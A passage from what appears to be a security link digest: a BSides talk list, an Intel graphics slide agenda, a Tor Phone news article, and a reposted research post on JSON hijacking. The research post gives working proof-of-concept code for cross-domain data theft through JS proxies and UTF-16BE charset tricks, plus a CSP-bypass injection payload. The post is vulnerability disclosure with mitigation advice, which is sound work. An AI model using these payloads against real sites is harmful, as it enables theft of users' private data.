     - Building an EmPyre with Python - Steve Borosh, Alexander Rymdeko-Harvey, Will Schroeder (50:19)
     - Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs (22:38)
     - Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff (47:31)
     - The Deal with Password Alternatives - Terry Gold (55:15)
     - QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? (1:04:23)
     - Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology (31:27)
     - One Compromise to Rule Them All - Bryce Kunz (53:00)
     - The Future of Bsides - Panel Session (52:46)
     - What's Up Argon2? The Password Hashing Winner A Year Later - JP Aumasson (24:59)
     - Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data (42:58)
     - I Love my BFF (Brute Force Framework) - Kirk Hayes (24:06)
     - Proactive Password Leak Processing - Bruce Marshall
     - Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) (22:21)
     - Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) (25:20)
     - Pushing Security from the Outside - Kat Sweet, Chris DeWeese (26:19)
     - Why it's all snake oil - and that may be ok - Andrew Morris (46:44)

     Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM
  22. Friday, November 25, 2016

JSON hijacking for the modern web

Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be patched well in Firefox, however I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__, they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__. Like so:

    <script>
    Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
      has:function(target,name){
        alert(name);
      }
    }));
    </script>
    <script src="external-script-with-undefined-variable"></script>
    <!-- script contains: stealme -->

Edge PoC stealing undefined variable

If you include a cross domain script with stealme in, you will see it alerts the value even though it's an undefined variable. After further testing I found you can achieve the same thing overwriting __proto__.__proto__ which is [object EventTargetPrototype] on Edge.

    <script>
    __proto__.__proto__=new Proxy(__proto__,{
      has:function(target,name){
        alert(name);
      }
    });
    </script>
    <script src="external-script-with-undefined-variable"></script>

Edge PoC stealing undefined variable method 2

Great, so we can steal data x-domain, but what else can we do? All major browsers support the charset attribute on script; I found that the UTF-16BE charset was particularly interesting. UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22, not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going? Let's say we have a response from the web server that returns an array literal and we can control some of it. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above.

The only caveat is that the resulting characters when combined must form a valid JavaScript variable. For example let's take a look at the following response:

    ["supersecret","input here"]

To steal supersecret we need to inject a NULL character followed by two a's; for some reason Edge doesn't treat it as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing, or maybe it's truncating the response and the characters after NULL are not a valid JS variable on Edge, I'm not sure, but in my tests it seems to require a NULL and padded out with some characters. See below for an example:

    <!doctype HTML>
    <script>
    Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
      has:function(target,name){
        alert(name.replace(/./g,function(c){
          c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);
        }));
      }
    }));
    </script>
    <script charset="UTF-16BE" src="external-script-with-array-literal"></script>
    <!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->

Edge PoC stealing JSON feeds

So we proxy the __proto__ property as before, include the script with a UTF-16BE charset, and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by bit shifting by 8 to obtain the first byte and bitwise AND to obtain the second byte. The result is an alert popup of ["supersecret"," as you can see Edge seems to truncate the response after the NULL. Note this attack is fairly limited because many characters when combined do not produce a valid JavaScript variable. However it may be useful to steal small amounts of data.

Stealing JSON feeds in Chrome

It gets worse. Chrome is far more liberal with scripts that have an exotic charset. You don't need to control any of the response in order for Chrome to use the charset. The only requirement is that, as before, the characters combined together produce a valid JavaScript variable. In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to have prevented overwriting the __proto__, however they forgot how deep the __proto__ goes...

    <script>
    __proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
      has:function f(target,name){
        var str = f.caller.toString();
        alert(str.replace(/./g,function(c){
          c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);
        }));
      }
    });
    </script>
    <script charset="UTF-16BE" src="external-script-with-array-literal"></script>
    <!-- script contains the following response: ["supersecret","abc"] -->

NOTE: This was fixed in Chrome 54

Chrome PoC stealing JSON feeds works in version 53

We go 5 levels deep down the __proto__ chain and overwrite it with our proxy, then what happens next is interesting: although the name argument doesn't contain our undefined variable, the caller of our function does! It returns a function with our variable name! Obviously encoded in UTF-16BE, it looks like this:

    function 嬢獵灥牳散牥琢Ⱒ慢挢崊

Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data, otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returns a different domain (maybe Chrome extension context). When Adblock Plus was enabled I saw some extension code using this method but was unable to exploit it since it appeared to be just code injecting into the current document. In my tests I was also able to include XML or HTML data cross domain even with text/html content type, which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome.

Stealing JSON feeds in Safari

We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller.

    <script>
    __proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
      has:function f(target,name){
        alert(name.replace(/./g,function(c){
          c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);
        }));
      }
    });
    </script>

Safari PoC stealing JSON feeds

After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__.

Hacking JSON feeds without JS proxies

I mentioned that the UTF-16BE charset works in every major browser; how can you hack JSON feeds without JS proxies? First you need to control some of the data, and the feed has to be constructed in such a way that it produces a valid JavaScript variable. To get the first part of the JSON feed before your injected data is pretty easy: all you do is output a UTF-16BE encoded string which assigns the non-ASCII variable to a specific value and then loop through the window and check if this value exists; then the property name will contain all the JSON feed before your injection. The code looks like this:

    =1337;for(i in window)if(window[i]===1337)alert(i)

This code is then encoded as a UTF-16BE string so we actually get the code instead of a non-ASCII variable. In effect this means just padding each character with a NULL. To get the characters after the injected string I simply use the increment operator and make the encoded string after a property of window. Then we call setTimeout and loop through the window again, but this time checking for NaN, which will have a variable name of our encoded string. See below:

    setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}catch(e){}}});++window.a

I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. The whole JSON feed will look like this:

    {"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"}

Hacking JSON feeds without proxies PoC

Bypassing CSP

As you might have noticed, a UTF-16BE converted string will also convert new lines to non-ASCII variables; this gives it potential to even bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that injects into itself, has an encoded assignment and payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference same domain (which is the majority of policies). The HTML document will have to look like this:

    <!doctype HTML><html>
    <head>
    <title>Test</title>
    <?php echo $_GET['x']; ?>
    </head>
    <body>
    </body>
    </html>

Notice there is no new line after the doctype; the HTML is constructed in such a way that it is valid JavaScript. The characters after the injection don't matter because we inject a trailing single line JavaScript comment and the new lines are converted too. Note that there is no charset declared in the document; this isn't because the charset matters, it's because the quotes and attributes of the meta element will break the JavaScript. The payload looks like this (note the tab is required in order to construct a valid variable):

    <script%20src="index.php?x=%2509%2500%253D%2500a%2500l%2500e%2500r%2500t%2500(%25001%2500)%2500%253B%2500%252F%2500%252F"%20charset="UTF-16BE"></script>

Note: This has been patched on later versions of PHP; it defaults to the UTF-8 charset for text/html content type, therefore preventing the attack. However I've simply added a blank charset to the JSON response so it still works on the lab.

CSP bypass using UTF-16BE PoC

Other charsets

I fuzzed every browser and charset. Edge was pretty useless to fuzz because, as mentioned previously, it does some sort of charset sniffing and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating, especially because the dev tools let you filter the results of the console by a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable but it is even more brittle than the UTF-16BE. Still I managed to get the following XML to import correctly on Chrome.

    <root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window[i]) && typeof window[i]===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root>

The above no longer works in Chrome but I've included it as another example. UTF-16 and UTF-16LE looked useful too since the output of the script looked like a JavaScript variable, but they caused invalid syntax errors when including a doctype, XML or a JSON string. Safari had a few interesting results too but in my tests I couldn't get it to produce valid JavaScript. It might be worth exploring further but it will be difficult to fuzz since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively.

CSS

You might think this technique could be applied to CSS and in theory it should, since any HTML will be converted into a non-ASCII invalid CSS selector, but in reality browsers seem to look at the document to see if there's a doctype header before parsing the CSS with the selected charset and ignore the stylesheet, making a self injected stylesheet fail. Edge, Firefox and IE in standards mode also seem to check the mime type; Chrome says the stylesheet was interpreted but at least in my tests it didn't seem that way.

Mitigation

The charset attacks can be prevented by declaring your charset such as UTF-8 in an HTTP content type header. PHP 5.6 also prevents these attacks by declaring a UTF-8 charset if none is set in the content-type header.

Conclusion

Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response.

Enjoy - @garethheyes

Posted by Gareth Heyes at 10:03 AM

Source: http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html
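The post's caveat (the response read as UTF-16BE has to form one valid JavaScript identifier) and its mitigation (a charset pinned in the Content-Type header), as an added example that is not part of the original post: it pairs a response body's bytes the way a UTF-16BE decoder would, tests the result against the ECMAScript identifier grammar, and reports no risk when the header already pins a charset. The response bodies and header values are constructed for illustration, and the pairing is a model of the decoding step rather than a browser's actual decoder.

```javascript
// Added example, not code from Gareth Heyes' post. Models how a browser that honours
// <script charset="UTF-16BE"> reads an ASCII JSON body, and turns the post's
// "must form a valid JavaScript variable" caveat plus its Content-Type mitigation
// into a check a defender can run over a response. Sample bodies are constructed.

// Pair up consecutive bytes of the body, big-endian, as a UTF-16BE decoder does.
// An odd trailing byte decodes to U+FFFD, which can never be part of an identifier.
function readAsUtf16be(body) {
  let out = "";
  for (let i = 0; i + 1 < body.length; i += 2) {
    out += String.fromCharCode((body.charCodeAt(i) << 8) | (body.charCodeAt(i + 1) & 0xff));
  }
  if (body.length % 2 === 1) out += "\uFFFD";
  return out;
}

// Reverse of the above, i.e. the c>>8 / c&0xff step the post's PoCs apply inside alert().
function decodeUtf16be(str) {
  return str.replace(/[\s\S]/g, (ch) => {
    const c = ch.charCodeAt(0);
    return String.fromCharCode(c >> 8, c & 0xff);
  });
}

// ECMAScript IdentifierName: ID_Start (plus $ and _) followed by ID_Continue
// (plus $, _, ZWNJ, ZWJ). Unicode property escapes require the u flag.
const IDENTIFIER = /^[\p{ID_Start}$_][\p{ID_Continue}$\u200C\u200D]*$/u;
function isIdentifier(s) {
  return IDENTIFIER.test(s);
}

// Defender's check for one response. A charset pinned in Content-Type takes
// precedence over the script element's charset attribute, so the reinterpretation
// never happens; without it, the body is exposed only if its UTF-16BE reading is
// one identifier (an array/object literal with a stray "]" or ":" pair is not).
function charsetLeakRisk(contentType, body) {
  if (/;\s*charset\s*=/i.test(contentType)) {
    return { risk: false, reason: "charset pinned in Content-Type" };
  }
  const asIdentifier = readAsUtf16be(body);
  if (!isIdentifier(asIdentifier)) {
    return { risk: false, reason: "UTF-16BE reading is not a single identifier" };
  }
  return { risk: true, reason: "body reads as identifier " + asIdentifier };
}

// Constructed responses: the post's Chrome example body (with its trailing newline),
// the same body with a pinned charset, and a feed whose pairs include a non-letter.
const SAMPLES = [
  ["application/json", '["supersecret","abc"]\n'],
  ["application/json; charset=utf-8", '["supersecret","abc"]\n'],
  ["application/json", '{"id":1}\n'],
];
for (const [type, body] of SAMPLES) {
  const r = charsetLeakRisk(type, body);
  console.log(JSON.stringify(type), r.risk ? "AT RISK:" : "safe:", r.reason);
}
```

For the first sample the identifier printed is the same 嬢獵灥牳散牥琢Ⱒ慢挢崊 the post shows leaking through f.caller in Chrome 53.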
  23. Agenda

1. Introduction (Jason)
2. Compute Architecture Evolution (Jason)
3. Chip Level Architecture (Jason)
   - Subslices, slices, products
4. Gen Compute Architecture (Maiyuran)
   - Execution units
5. Instruction Set Architecture (Ken)
6. Memory Sharing Architecture (Jason)
7. Mapping Programming Models to Architecture (Jason)
8. Summary

Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf
  24. The Tor Phone prototype: a truly private smartphone?

29 NOV 2016, by Bill Camarda

The Tor Project has long offered high-security alternatives for folk who are especially concerned about their privacy. But as the world goes mobile, and is increasingly accessed through smartphones, users become vulnerable to a whole new set of compromises. That’s where the Tor Phone prototype comes in – and it’s just been significantly improved.

According to developer Mike Perry, Tor Phone aims:

    …to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users.

It’s also “meant to show that it is still possible to replace and modify your mobile phone’s operating system while retaining verified boot security – though only just barely”.

Tor Phone starts with Copperhead OS, an open-source Android fork focused on security. As Perry writes:

    Copperhead is also the only Android ROM that supports Verified Boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions… Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected).

Therein lies a huge obstacle to Tor Phone deployment, however. Together with Copperhead, Tor Phone installs the Orbot Tor proxy app, OrWall firewall, F-Droid alternative app repository, additional tools, and finally, Google Play (primarily, Perry says, so you can retrieve the Signal app for encrypted voice calling and instant messaging). Its components must install to the system partition. Therefore, says Perry:

    We must re-sign the Copperhead image and updates… to [maintain] system integrity from Verified Boot.

Unfortunately, only selected Google Nexus/Pixel devices let users control this with their own keys, while still supporting Verified Boot. So you can’t do this with your own cheap-o Android device, no matter how strong your Linux and related skills are – what’s more, a quick look at the directions confirms that setting up Tor Phone is non-trivial. You can jumpstart the process by purchasing a smartphone with Copperhead pre-installed – for the moment, of course, while supplies last. And, with the right hardware, says Perry, Tor Phone works: notwithstanding some “rough edges,” he relies on his right now.

Why bother with all this? Perry and Tor argue that Google is increasingly moving to lock down the Android platform, claiming it’s the only way to overcome Android’s “fragmentation and resulting insecurity”. Tor argues instead for a strategy based on transparency:

    [As] more components and apps are moved to closed source versions, Google [reduces] its ability to resist the demand that backdoors be introduced.

Those might come from nefarious governments, of course. But, in Ars Technica, Perry notes that untraceable backdoors might also be introduced by hackers purely interested in financial gain. This is less likely, he argues, if a mobile OS remains fully open…

    We are concerned that the freedom of users to use, study, share, and improve the operating system software on their phones is being threatened. If we lose these freedoms on mobile, we may never get them back.

For Tor Phone to gain traction, it’ll probably need to run on more than a couple of high-end devices manufactured by Google itself. In Ars Technica, Perry stresses that Tor won’t enter the secure hardware business. But someone could, he says, citing the crowdfunded Neo900 project as a model:

    What I’ve found is that posts like [his Tor Phone update] energise the Android hobbyist/free software ecosystem, and make us aware of each other and common purpose.

If you’re thinking “sounds like there’s a long way to go,” Perry might agree. He named his current prototype “Mission Improbable”. But that’s big progress: he named the previous prototype “Mission Impossible”.

Source: https://nakedsecurity.sophos.com/2016/11/29/the-tor-phone-prototype-a-truly-private-smartphone/